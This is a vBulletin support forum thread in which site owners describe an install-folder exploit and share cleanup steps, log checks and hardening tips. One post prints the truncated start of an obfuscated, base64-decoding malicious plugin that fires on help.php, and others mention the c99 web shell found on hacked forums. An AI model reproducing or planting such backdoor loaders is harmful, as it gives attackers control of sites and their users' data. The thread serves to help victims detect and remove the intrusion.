vBulletin 4.2.5 is end of life and will not be receiving any future development. Warning: vBulletin 4.2.5 is not compatible with PHP 7.2.0 or higher.
Welcome to the vBulletin support forums! In our community forums you can receive professional support and assistance with any issues you might have with your vBulletin Products.
If you are having problems posting in the relevant areas for your software, please see this topic.
Upgrade to vBulletin 5
We're pleased to announce a special promotion for upgrading your vBulletin 3/4 sites to vBulletin 5. From now until December 31st, we are offering vBulletin 5 license upgrades at $169 each. This promotion is available to all vBulletin 3 (owned) and vBulletin 4 license holders, entitling you to the latest version of vBulletin 5.
If you would like to purchase this upgrade, please log into the vBulletin Members Area and use Promo Code: vB5UPGRADE during checkout to apply the discount.
I see it so many times..... Too many times infact....
But that is all I see......
I have no htaccess things that I have done, I don't know how to do it. I have no hacks, no new admins, plugins, defacement issues. No intrusions whatsoever.
I did remove the install folder at a very early stage in this recent exploit..
Maybe I have been lucky so far? Maybe I just don't see what I am supposed to be looking for..? Maybe it will happen to me soon?
There really is no finite explanation/solution here....
I restored a clean file system.. I removed the install folder.. the admins.. and I have been hacked 2 more times since..
On my hacked forum, I found that they had uploaded some PHP shell scripts. If you don't remove those shell scripts, you could be in a world of hurt. Those shells can give them access to modify almost anything on your server - not just vBulletin. Here's everything I did to clean this up:
remove vBulletin install directory
change the admin password
change MySQL password
remove hacker admin accounts
remove uploaded shell scripts
remove hacker plugins
remove hacker language variables
remove hacker notices
remove hacker announcements
block IP ranges that accessed the upgrade.php file or shell scripts
The late notification from VB gave no information at all, just 'delete install'. Given that I had no signs of a hack, I did it and moved on.
I came across this thread tonight and yes, like everyone else I have new admin users. In my case they don't seem to have done anything, perhaps because my admincp is renamed and well protected. Fingers crossed. I still have some checking to do, but it's looking promising.
Just in case any of the VB staff are still monitoring this, your response has been very poor. It would take minimal effort to add some detail to your exploit report, or send a second email once the level of detail in this thread became available. There are no doubt plenty of forum admins out there who are happily going about their business safe in the knowledge that the exploit was sorted and no damage done. And plenty of those will have some new administrators and plugins to keep them company.
I have been teetering on the edge of jumping ship given the progress of VB5 and because VB4 seems to no longer be in development. VBSEO also in troubled water. The appalling response to this exploit, coupled with some pretty 'f*** you' type responses from the staff in the discussions of this make me really keen to get on and use that Xenforo license I bought a couple of months ago.
Edit: to add something constructive to my whinge, I did what maybe a useful plugin check for others. I looked at the sequence of plugin IDs in the prefix_plugin table, ordering by the id descending. Then I looked at the next auto_increment id and make sure that there isn't a gap between the last known, trusted plugin created and the next ID. If there is a gap, then there is a chance that something has been created and then deleted. Get the auto_increment id using:
SELECT `AUTO_INCREMENT` FROM information_schema.`TABLES` WHERE TABLE_SCHEMA = 'your_database' AND TABLE_NAME = 'yourprefix_plugin';
I also checked the controlpanel log for gaps over the periods from registration to most recent activity of my new admin users. That would give an idea if something was done, then the log pruned.
Edit 2: I do have an entry in my control panel log for a user called . , one of the new administrators. He accessed forum.php on 1 Sep and the action was 'modify'. However if I search for that or the email address given in my server logs, I can't find an entry. Can anyone shed any light on how that could be? Of any way of checking what the modify actually was?
I had him get on my site too, but no damage was done... because I always double bag it.
NEVER EVER EVER EVER trust the security of vbulletin, wordpress, oscommerce, whatever, any software you install on your website. NEVER trust it. Always double up the admin login with .htaccesss password protection.
I had admin accounts created on my website but, because I had password protected the admincp, they were never able to do anything. These aren't real hackers, they're script kiddies, they get a recipe off a black hat website and follow it. Double bagging might not stop a real determined hacker, but it'll stop these people.
Another thing is to remove vbulletin's display of version information from public pages, which means they won't find your forum when they search for the specific version they have the exploit for.
Someone may have mentioned these things already, I've not read the whole thread yet. But they bare repeating in anycase.
Also yes, when an exploit is found, give more details, tell us what to look for.
Removing your version number, won't really do much, there are still plenty of ways to find your site, so that is sort of moot.
We only give enough information, so as to make sure you're aware of the exploit. Full Disclosure only helps the people who really want to attack you guys. Not our customers.
Please check admincp/help.php, by clicking the "?" somewhere in the admin control panel. I've downloaded yesterday the 4.2.x version and it shows up a very bad page!
I noticed a plugin change with the following code:
if (strpos($_SERVER['PHP_SELF'],"help.php")) {
if(!function_exists("TC9A16C47DA8EEE87")){function TC9A16C47DA8EEE87($T059EC46CFE335260){$T059EC46CFE335260=base64_decode($T059EC46CFE335260) ;$TC9A16C47DA8EEE87=0;$TA7FB8B0A1C0E2E9E=0;$T17D35BB9DF7A47E4=0;$T65CE9F6823D588A7=(ord($T 0......
It seems that when accessing the HELP page, the plugin starts up some bad code.
Last edited by TheMax74; Sat 14th Sep '13, 3:07am.
Going through a site now with files that contained the code above you posted along with an non-base_64 coded version in the plugin manager titled Skimlinks_vb with contents:
So that allows file uploads, check for shell scripts (the one you posted image of is a very bad shell script read more here - http://www.derekfountain.org/security_c99madshell.php because by accessing your help.php page the hacker was able to let the c99 madshell interact with your site.
That is just great - I own my forum, but I do not know how to do that. Is VB going to cover the cost for me to pay my IT guy to do this for me? This is the 11th and I did not here anything about this until I* was hacked. I can't even access my site at this point. I own 7 VB sites - should I expect the other 6 to be trashed too????
How do I remove this?? vbulletin-forumhome.js File not recognized as part of vBulletin
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...
X
We process personal data about users of our site, through the use of cookies and other technologies, to deliver our services, personalize advertising, and to analyze site activity. We may share certain information about our users with our advertising and analytics partners. For additional details, refer to our Privacy Policy.
By clicking "I AGREE" below, you agree to our Privacy Policy and our personal data processing and cookie practices as described therein. You also consent to the transfer of your data to our servers in the United States, where data protection laws may be different from those in your country.
Comment